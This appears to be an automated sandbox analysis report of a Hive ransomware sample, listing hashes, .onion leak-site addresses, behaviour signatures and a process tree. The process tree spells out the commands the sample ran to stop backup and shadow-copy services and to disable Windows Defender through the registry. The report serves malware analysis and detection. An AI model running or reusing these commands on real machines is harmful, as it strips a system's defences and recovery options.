Analysis
-
max time kernel
126s -
max time network
54s -
platform
windows7_x64 -
resource
win7-20220901-en -
resource tags
arch:x64arch:x86image:win7-20220901-enlocale:en-usos:windows7-x64system -
submitted
30-10-2022 15:44
Static task
static1
Behavioral task
behavioral1
Sample
decoding_data.exe
Resource
win7-20220901-en
Behavioral task
behavioral2
Sample
decoding_data.exe
Resource
win10v2004-20220812-en
General
-
Target
decoding_data.exe
-
Size
3.4MB
-
MD5
177417be748814f6168171a42545f9dd
-
SHA1
9c8b988e66e0fe6f9dab69b1055e4ee200531094
-
SHA256
47dbb2594cd5eb7015ef08b7fb803cd5adc1a1fbe4849dc847c0940f1ccace35
-
SHA512
c90eebbd4663ffe4bec089e21e4f7c1a1441e21a2f78cc190b9ce85fd048bf46901aa74273695df7b6434887284a26d4fdaaf657cb5d9c5469574158adc351c2
-
SSDEEP
49152:EynbnX4Rsrb/TFvO90dL3BmAFd4A64nsfJUvelzON7j93aqSCD0BUCoQPr8bg11t:EyrAe2lS75Hw+i4JROD5R
Malware Config
Extracted
C:\Djfk_HOW_TO_DECRYPT.txt
hive
http://hiveleakdbtnp76ulyhi52eag6c6tyc3xw7ez7iqy6wc34gd2nekazyd.onion/
http://hivecust6vhekztbqgdnkks64ucehqacge3dij3gyrrpdp57zoq3ooqd.onion/
Signatures
-
Deletes Windows Defender Definitions 2 TTPs 1 IoCs
Uses mpcmdrun utility to delete all AV definitions.
Processes:
MpCmdRun.exepid Process 1648 MpCmdRun.exe -
Hive
A ransomware written in Golang first seen in June 2021.
-
Processes:
reg.exereg.exereg.exereg.exereg.exedescription ioc Process Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" reg.exe -
Modifies security service 2 TTPs 1 IoCs
Processes:
reg.exedescription ioc Process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4" reg.exe -
Clears Windows event logs 1 TTPs 3 IoCs
Processes:
wevtutil.exewevtutil.exewevtutil.exepid Process 1952 wevtutil.exe 2044 wevtutil.exe 1616 wevtutil.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
Processes:
bcdedit.exebcdedit.exepid Process 1800 bcdedit.exe 1012 bcdedit.exe -
Modifies extensions of user files 8 IoCs
Ransomware generally changes the extension on encrypted files.
Processes:
decoding_data.exedescription ioc Process File opened for modification C:\Users\Admin\Pictures\ExitRequest.png.0tq1QnaCLzBpCi59GyT74nJcxPqXefnpTAY42BuFbY3_asKm7nwg4Qo0.snwkz decoding_data.exe File renamed C:\Users\Admin\Pictures\SubmitDisconnect.tiff => C:\Users\Admin\Pictures\SubmitDisconnect.tiff.0tq1QnaCLzBpCi59GyT74nJcxPqXefnpTAY42BuFbY3_i0OGd2PuOCc0.snwkz decoding_data.exe File opened for modification C:\Users\Admin\Pictures\SubmitDisconnect.tiff.0tq1QnaCLzBpCi59GyT74nJcxPqXefnpTAY42BuFbY3_i0OGd2PuOCc0.snwkz decoding_data.exe File renamed C:\Users\Admin\Pictures\DebugAssert.raw => C:\Users\Admin\Pictures\DebugAssert.raw.0tq1QnaCLzBpCi59GyT74nJcxPqXefnpTAY42BuFbY3_9SkGlN21IZA0.snwkz decoding_data.exe File opened for modification C:\Users\Admin\Pictures\DebugAssert.raw.0tq1QnaCLzBpCi59GyT74nJcxPqXefnpTAY42BuFbY3_9SkGlN21IZA0.snwkz decoding_data.exe File renamed C:\Users\Admin\Pictures\DisableLock.tiff => C:\Users\Admin\Pictures\DisableLock.tiff.0tq1QnaCLzBpCi59GyT74nJcxPqXefnpTAY42BuFbY3_fjZLlb0flAA0.snwkz decoding_data.exe File opened for modification C:\Users\Admin\Pictures\DisableLock.tiff.0tq1QnaCLzBpCi59GyT74nJcxPqXefnpTAY42BuFbY3_fjZLlb0flAA0.snwkz decoding_data.exe File renamed C:\Users\Admin\Pictures\ExitRequest.png => C:\Users\Admin\Pictures\ExitRequest.png.0tq1QnaCLzBpCi59GyT74nJcxPqXefnpTAY42BuFbY3_asKm7nwg4Qo0.snwkz decoding_data.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Drops file in Program Files directory 64 IoCs
Processes:
decoding_data.exedescription ioc Process File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Fakaofo.0tq1QnaCLzBpCi59GyT74nJcxPqXefnpTAY42BuFbY3_AmBn5xSJb880.snwkz decoding_data.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-text_ja.jar.0tq1QnaCLzBpCi59GyT74nJcxPqXefnpTAY42BuFbY3_rwrLXwiw6ME0.snwkz decoding_data.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\SAVE.GIF.0tq1QnaCLzBpCi59GyT74nJcxPqXefnpTAY42BuFbY3_bnxcVCgUTFA0.snwkz decoding_data.exe File opened for modification C:\Program Files (x86)\Windows Media Player\fr-FR\wmpnssci.dll.mui decoding_data.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\Djfk_HOW_TO_DECRYPT.txt decoding_data.exe File opened for modification C:\Program Files\Java\jre7\lib\jfr\profile.jfc.0tq1QnaCLzBpCi59GyT74nJcxPqXefnpTAY42BuFbY3_SKDC3KnwRpE0.snwkz decoding_data.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\es-ES\css\weather.css decoding_data.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH01332U.BMP.0tq1QnaCLzBpCi59GyT74nJcxPqXefnpTAY42BuFbY3__hg8Of46xQI0.snwkz decoding_data.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\TR00116_.WMF.0tq1QnaCLzBpCi59GyT74nJcxPqXefnpTAY42BuFbY3_q_pq_IRKbEQ0.snwkz decoding_data.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Currency.Gadget\en-US\css\currency.css decoding_data.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME27.CSS.0tq1QnaCLzBpCi59GyT74nJcxPqXefnpTAY42BuFbY3_ZrqawBj5Wns0.snwkz decoding_data.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\de-DE\gadget.xml decoding_data.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.publisher.nl_zh_4.4.0.v20140623020002.jar.0tq1QnaCLzBpCi59GyT74nJcxPqXefnpTAY42BuFbY3_2S7arkUkOe00.snwkz decoding_data.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\my\LC_MESSAGES\vlc.mo.0tq1QnaCLzBpCi59GyT74nJcxPqXefnpTAY42BuFbY3_Nvtme1O8v5I0.snwkz decoding_data.exe File opened for modification C:\Program Files\Windows Photo Viewer\it-IT\PhotoViewer.dll.mui decoding_data.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\diner_s.png decoding_data.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Kolkata.0tq1QnaCLzBpCi59GyT74nJcxPqXefnpTAY42BuFbY3_fqs4FaKemIU0.snwkz decoding_data.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Indiana\Winamac.0tq1QnaCLzBpCi59GyT74nJcxPqXefnpTAY42BuFbY3_vCF5Ifruqjc0.snwkz decoding_data.exe File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\SKY\THMBNAIL.PNG.0tq1QnaCLzBpCi59GyT74nJcxPqXefnpTAY42BuFbY3_wO1g3Ri0FyU0.snwkz decoding_data.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Currency.Gadget\images\base-undocked-3.png decoding_data.exe File opened for modification C:\Program Files (x86)\Windows Mail\it-IT\msoeres.dll.mui decoding_data.exe File opened for modification C:\Program Files\7-Zip\Lang\pl.txt.0tq1QnaCLzBpCi59GyT74nJcxPqXefnpTAY42BuFbY3_ufGgpLE_Gjs0.snwkz decoding_data.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Full\full.png decoding_data.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.rcp_5.5.0.165303\feature.properties.0tq1QnaCLzBpCi59GyT74nJcxPqXefnpTAY42BuFbY3_P1bb8A10N5g0.snwkz decoding_data.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Oasis.css.0tq1QnaCLzBpCi59GyT74nJcxPqXefnpTAY42BuFbY3_kj5tQkWEAqw0.snwkz decoding_data.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-autoupdate-services.xml.0tq1QnaCLzBpCi59GyT74nJcxPqXefnpTAY42BuFbY3_lyqfv_I4jI40.snwkz decoding_data.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-autoupdate-services.jar.0tq1QnaCLzBpCi59GyT74nJcxPqXefnpTAY42BuFbY3_922qrAm-kF40.snwkz decoding_data.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Antarctica\Rothera.0tq1QnaCLzBpCi59GyT74nJcxPqXefnpTAY42BuFbY3_jDXzpOjpYTU0.snwkz decoding_data.exe File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0299587.WMF.0tq1QnaCLzBpCi59GyT74nJcxPqXefnpTAY42BuFbY3_qRzrFrMqn_o0.snwkz decoding_data.exe File opened for modification C:\Program Files\Java\jre7\lib\jvm.hprof.txt.0tq1QnaCLzBpCi59GyT74nJcxPqXefnpTAY42BuFbY3_-AAAWtluXTs0.snwkz decoding_data.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\WB01296_.GIF.0tq1QnaCLzBpCi59GyT74nJcxPqXefnpTAY42BuFbY3_ef-m7yqGtwU0.snwkz decoding_data.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\OutlookAutoDiscover\WANS.NET.XML.0tq1QnaCLzBpCi59GyT74nJcxPqXefnpTAY42BuFbY3_1pBEPgKtgOM0.snwkz decoding_data.exe File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\OFFICE14\1033\README.HTM.0tq1QnaCLzBpCi59GyT74nJcxPqXefnpTAY42BuFbY3_UY65NKaiYpM0.snwkz decoding_data.exe File opened for modification C:\Program Files (x86)\Windows Media Player\de-DE\WMPMediaSharing.dll.mui decoding_data.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_moon-new.png decoding_data.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-actions_ja.jar.0tq1QnaCLzBpCi59GyT74nJcxPqXefnpTAY42BuFbY3_L-GXfUCjgMg0.snwkz decoding_data.exe File opened for modification C:\Program Files\Java\jre7\lib\classlist.0tq1QnaCLzBpCi59GyT74nJcxPqXefnpTAY42BuFbY3_tCBIK2FAnsA0.snwkz decoding_data.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\RSSFeeds.Gadget\ja-JP\RSSFeeds.html decoding_data.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\de-DE\js\localizedStrings.js decoding_data.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0107300.WMF.0tq1QnaCLzBpCi59GyT74nJcxPqXefnpTAY42BuFbY3_f3iTbsDSpw00.snwkz decoding_data.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO00911_.WMF.0tq1QnaCLzBpCi59GyT74nJcxPqXefnpTAY42BuFbY3_pBjdZSabCm00.snwkz decoding_data.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\OMSSMS.CFG.0tq1QnaCLzBpCi59GyT74nJcxPqXefnpTAY42BuFbY3_qWl4ITGxToo0.snwkz decoding_data.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\RSSFeeds.Gadget\es-ES\flyout.html decoding_data.exe File opened for modification C:\Program Files\7-Zip\Lang\mn.txt.0tq1QnaCLzBpCi59GyT74nJcxPqXefnpTAY42BuFbY3_SCivEQCxg_Q0.snwkz decoding_data.exe File opened for modification C:\Program Files\Windows Journal\ja-JP\Journal.exe.mui decoding_data.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\MediaCenter.Gadget\images\button_right_mousedown.png decoding_data.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\144DPI\(144DPI)notConnectedStateIcon.png decoding_data.exe File created C:\Program Files\VideoLAN\VLC\locale\pt_PT\LC_MESSAGES\Djfk_HOW_TO_DECRYPT.txt decoding_data.exe File opened for modification C:\Program Files\Mozilla Firefox\fonts\TwemojiMozilla.ttf.0tq1QnaCLzBpCi59GyT74nJcxPqXefnpTAY42BuFbY3_UAO4VPgZWSc0.snwkz decoding_data.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\daisies.png decoding_data.exe File created C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\SoftBlue\Djfk_HOW_TO_DECRYPT.txt decoding_data.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\nav_leftarrow.png decoding_data.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Malta.0tq1QnaCLzBpCi59GyT74nJcxPqXefnpTAY42BuFbY3_sKRhYSWGXI80.snwkz decoding_data.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\icons\day-of-week-16.png.0tq1QnaCLzBpCi59GyT74nJcxPqXefnpTAY42BuFbY3_FpoUbAesWCQ0.snwkz decoding_data.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Australia\Currie.0tq1QnaCLzBpCi59GyT74nJcxPqXefnpTAY42BuFbY3_Ua0Ye9PZ7vQ0.snwkz decoding_data.exe File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18184_.WMF.0tq1QnaCLzBpCi59GyT74nJcxPqXefnpTAY42BuFbY3_yyYTlHfqDDM0.snwkz decoding_data.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\SoftBlue\TAB_ON.GIF.0tq1QnaCLzBpCi59GyT74nJcxPqXefnpTAY42BuFbY3_VY1vo9G1BZY0.snwkz decoding_data.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\settings_right_pressed.png decoding_data.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\RSSFeeds.Gadget\fr-FR\gadget.xml decoding_data.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Argentina\La_Rioja.0tq1QnaCLzBpCi59GyT74nJcxPqXefnpTAY42BuFbY3_v6girOgseoM0.snwkz decoding_data.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Indiana\Vevay.0tq1QnaCLzBpCi59GyT74nJcxPqXefnpTAY42BuFbY3_3TWFZX63moE0.snwkz decoding_data.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can.hyp.0tq1QnaCLzBpCi59GyT74nJcxPqXefnpTAY42BuFbY3_-mdp51VXdAw0.snwkz decoding_data.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA00438_.WMF.0tq1QnaCLzBpCi59GyT74nJcxPqXefnpTAY42BuFbY3_uJ09e39ydjY0.snwkz decoding_data.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\144DPI\(144DPI)redStateIcon.png decoding_data.exe -
Launches sc.exe 8 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exepid Process 1960 sc.exe 1284 sc.exe 604 sc.exe 1636 sc.exe 1904 sc.exe 1908 sc.exe 288 sc.exe 1928 sc.exe -
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes:
vssadmin.exepid Process 1404 vssadmin.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 3 IoCs
Processes:
powershell.exepowershell.exedecoding_data.exepid Process 1100 powershell.exe 572 powershell.exe 1448 decoding_data.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
wevtutil.exewevtutil.exewevtutil.exewmic.exewmic.exedescription pid Process Token: SeSecurityPrivilege 1952 wevtutil.exe Token: SeBackupPrivilege 1952 wevtutil.exe Token: SeSecurityPrivilege 2044 wevtutil.exe Token: SeBackupPrivilege 2044 wevtutil.exe Token: SeSecurityPrivilege 1616 wevtutil.exe Token: SeBackupPrivilege 1616 wevtutil.exe Token: SeIncreaseQuotaPrivilege 976 wmic.exe Token: SeSecurityPrivilege 976 wmic.exe Token: SeTakeOwnershipPrivilege 976 wmic.exe Token: SeLoadDriverPrivilege 976 wmic.exe Token: SeSystemProfilePrivilege 976 wmic.exe Token: SeSystemtimePrivilege 976 wmic.exe Token: SeProfSingleProcessPrivilege 976 wmic.exe Token: SeIncBasePriorityPrivilege 976 wmic.exe Token: SeCreatePagefilePrivilege 976 wmic.exe Token: SeBackupPrivilege 976 wmic.exe Token: SeRestorePrivilege 976 wmic.exe Token: SeShutdownPrivilege 976 wmic.exe Token: SeDebugPrivilege 976 wmic.exe Token: SeSystemEnvironmentPrivilege 976 wmic.exe Token: SeRemoteShutdownPrivilege 976 wmic.exe Token: SeUndockPrivilege 976 wmic.exe Token: SeManageVolumePrivilege 976 wmic.exe Token: 33 976 wmic.exe Token: 34 976 wmic.exe Token: 35 976 wmic.exe Token: SeIncreaseQuotaPrivilege 368 wmic.exe Token: SeSecurityPrivilege 368 wmic.exe Token: SeTakeOwnershipPrivilege 368 wmic.exe Token: SeLoadDriverPrivilege 368 wmic.exe Token: SeSystemProfilePrivilege 368 wmic.exe Token: SeSystemtimePrivilege 368 wmic.exe Token: SeProfSingleProcessPrivilege 368 wmic.exe Token: SeIncBasePriorityPrivilege 368 wmic.exe Token: SeCreatePagefilePrivilege 368 wmic.exe Token: SeBackupPrivilege 368 wmic.exe Token: SeRestorePrivilege 368 wmic.exe Token: SeShutdownPrivilege 368 wmic.exe Token: SeDebugPrivilege 368 wmic.exe Token: SeSystemEnvironmentPrivilege 368 wmic.exe Token: SeRemoteShutdownPrivilege 368 wmic.exe Token: SeUndockPrivilege 368 wmic.exe Token: SeManageVolumePrivilege 368 wmic.exe Token: 33 368 wmic.exe Token: 34 368 wmic.exe Token: 35 368 wmic.exe Token: SeIncreaseQuotaPrivilege 368 wmic.exe Token: SeSecurityPrivilege 368 wmic.exe Token: SeTakeOwnershipPrivilege 368 wmic.exe Token: SeLoadDriverPrivilege 368 wmic.exe Token: SeSystemProfilePrivilege 368 wmic.exe Token: SeSystemtimePrivilege 368 wmic.exe Token: SeProfSingleProcessPrivilege 368 wmic.exe Token: SeIncBasePriorityPrivilege 368 wmic.exe Token: SeCreatePagefilePrivilege 368 wmic.exe Token: SeBackupPrivilege 368 wmic.exe Token: SeRestorePrivilege 368 wmic.exe Token: SeShutdownPrivilege 368 wmic.exe Token: SeDebugPrivilege 368 wmic.exe Token: SeSystemEnvironmentPrivilege 368 wmic.exe Token: SeRemoteShutdownPrivilege 368 wmic.exe Token: SeUndockPrivilege 368 wmic.exe Token: SeManageVolumePrivilege 368 wmic.exe Token: 33 368 wmic.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
decoding_data.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exedescription pid Process procid_target PID 1448 wrote to memory of 1116 1448 decoding_data.exe 27 PID 1448 wrote to memory of 1116 1448 decoding_data.exe 27 PID 1448 wrote to memory of 1116 1448 decoding_data.exe 27 PID 1116 wrote to memory of 1936 1116 net.exe 29 PID 1116 wrote to memory of 1936 1116 net.exe 29 PID 1116 wrote to memory of 1936 1116 net.exe 29 PID 1448 wrote to memory of 960 1448 decoding_data.exe 30 PID 1448 wrote to memory of 960 1448 decoding_data.exe 30 PID 1448 wrote to memory of 960 1448 decoding_data.exe 30 PID 960 wrote to memory of 1412 960 net.exe 32 PID 960 wrote to memory of 1412 960 net.exe 32 PID 960 wrote to memory of 1412 960 net.exe 32 PID 1448 wrote to memory of 1180 1448 decoding_data.exe 33 PID 1448 wrote to memory of 1180 1448 decoding_data.exe 33 PID 1448 wrote to memory of 1180 1448 decoding_data.exe 33 PID 1180 wrote to memory of 572 1180 net.exe 35 PID 1180 wrote to memory of 572 1180 net.exe 35 PID 1180 wrote to memory of 572 1180 net.exe 35 PID 1448 wrote to memory of 680 1448 decoding_data.exe 36 PID 1448 wrote to memory of 680 1448 decoding_data.exe 36 PID 1448 wrote to memory of 680 1448 decoding_data.exe 36 PID 680 wrote to memory of 668 680 net.exe 38 PID 680 wrote to memory of 668 680 net.exe 38 PID 680 wrote to memory of 668 680 net.exe 38 PID 1448 wrote to memory of 1632 1448 decoding_data.exe 39 PID 1448 wrote to memory of 1632 1448 decoding_data.exe 39 PID 1448 wrote to memory of 1632 1448 decoding_data.exe 39 PID 1632 wrote to memory of 1092 1632 net.exe 41 PID 1632 wrote to memory of 1092 1632 net.exe 41 PID 1632 wrote to memory of 1092 1632 net.exe 41 PID 1448 wrote to memory of 1048 1448 decoding_data.exe 42 PID 1448 wrote to memory of 1048 1448 decoding_data.exe 42 PID 1448 wrote to memory of 1048 1448 decoding_data.exe 42 PID 1048 wrote to memory of 924 1048 net.exe 44 PID 1048 wrote to memory of 924 1048 net.exe 44 PID 1048 wrote to memory of 924 1048 net.exe 44 PID 1448 wrote to memory of 980 1448 decoding_data.exe 45 PID 1448 wrote to memory of 980 1448 decoding_data.exe 45 PID 1448 wrote to memory of 980 1448 decoding_data.exe 45 PID 980 wrote to memory of 1924 980 net.exe 47 PID 980 wrote to memory of 1924 980 net.exe 47 PID 980 wrote to memory of 1924 980 net.exe 47 PID 1448 wrote to memory of 1964 1448 decoding_data.exe 48 PID 1448 wrote to memory of 1964 1448 decoding_data.exe 48 PID 1448 wrote to memory of 1964 1448 decoding_data.exe 48 PID 1964 wrote to memory of 1540 1964 net.exe 50 PID 1964 wrote to memory of 1540 1964 net.exe 50 PID 1964 wrote to memory of 1540 1964 net.exe 50 PID 1448 wrote to memory of 1636 1448 decoding_data.exe 51 PID 1448 wrote to memory of 1636 1448 decoding_data.exe 51 PID 1448 wrote to memory of 1636 1448 decoding_data.exe 51 PID 1448 wrote to memory of 1904 1448 decoding_data.exe 53 PID 1448 wrote to memory of 1904 1448 decoding_data.exe 53 PID 1448 wrote to memory of 1904 1448 decoding_data.exe 53 PID 1448 wrote to memory of 1908 1448 decoding_data.exe 55 PID 1448 wrote to memory of 1908 1448 decoding_data.exe 55 PID 1448 wrote to memory of 1908 1448 decoding_data.exe 55 PID 1448 wrote to memory of 288 1448 decoding_data.exe 57 PID 1448 wrote to memory of 288 1448 decoding_data.exe 57 PID 1448 wrote to memory of 288 1448 decoding_data.exe 57 PID 1448 wrote to memory of 1928 1448 decoding_data.exe 59 PID 1448 wrote to memory of 1928 1448 decoding_data.exe 59 PID 1448 wrote to memory of 1928 1448 decoding_data.exe 59 PID 1448 wrote to memory of 1960 1448 decoding_data.exe 61
Processes
-
C:\Users\Admin\AppData\Local\Temp\decoding_data.exe"C:\Users\Admin\AppData\Local\Temp\decoding_data.exe"1⤵
- Modifies extensions of user files
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1448 -
C:\Windows\system32\net.exenet.exe stop "NetMsmqActivator" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1116 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "NetMsmqActivator" /y3⤵PID:1936
-
-
-
C:\Windows\system32\net.exenet.exe stop "SamSs" /y2⤵
- Suspicious use of WriteProcessMemory
PID:960 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SamSs" /y3⤵PID:1412
-
-
-
C:\Windows\system32\net.exenet.exe stop "SDRSVC" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1180 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SDRSVC" /y3⤵PID:572
-
-
-
C:\Windows\system32\net.exenet.exe stop "SstpSvc" /y2⤵
- Suspicious use of WriteProcessMemory
PID:680 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SstpSvc" /y3⤵PID:668
-
-
-
C:\Windows\system32\net.exenet.exe stop "UI0Detect" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1632 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "UI0Detect" /y3⤵PID:1092
-
-
-
C:\Windows\system32\net.exenet.exe stop "VSS" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1048 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "VSS" /y3⤵PID:924
-
-
-
C:\Windows\system32\net.exenet.exe stop "wbengine" /y2⤵
- Suspicious use of WriteProcessMemory
PID:980 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "wbengine" /y3⤵PID:1924
-
-
-
C:\Windows\system32\net.exenet.exe stop "WebClient" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1964 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "WebClient" /y3⤵PID:1540
-
-
-
C:\Windows\system32\sc.exesc.exe config "NetMsmqActivator" start= disabled2⤵
- Launches sc.exe
PID:1636
-
-
C:\Windows\system32\sc.exesc.exe config "SamSs" start= disabled2⤵
- Launches sc.exe
PID:1904
-
-
C:\Windows\system32\sc.exesc.exe config "SDRSVC" start= disabled2⤵
- Launches sc.exe
PID:1908
-
-
C:\Windows\system32\sc.exesc.exe config "SstpSvc" start= disabled2⤵
- Launches sc.exe
PID:288
-
-
C:\Windows\system32\sc.exesc.exe config "UI0Detect" start= disabled2⤵
- Launches sc.exe
PID:1928
-
-
C:\Windows\system32\sc.exesc.exe config "VSS" start= disabled2⤵
- Launches sc.exe
PID:1960
-
-
C:\Windows\system32\sc.exesc.exe config "wbengine" start= disabled2⤵
- Launches sc.exe
PID:1284
-
-
C:\Windows\system32\sc.exesc.exe config "WebClient" start= disabled2⤵
- Launches sc.exe
PID:604
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1580
-
-
C:\Windows\system32\reg.exereg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f2⤵PID:1528
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f2⤵PID:1672
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f2⤵PID:320
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f2⤵PID:840
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f2⤵
- Modifies Windows Defender Real-time Protection settings
PID:1576
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f2⤵
- Modifies Windows Defender Real-time Protection settings
PID:1464
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f2⤵
- Modifies Windows Defender Real-time Protection settings
PID:324
-
-
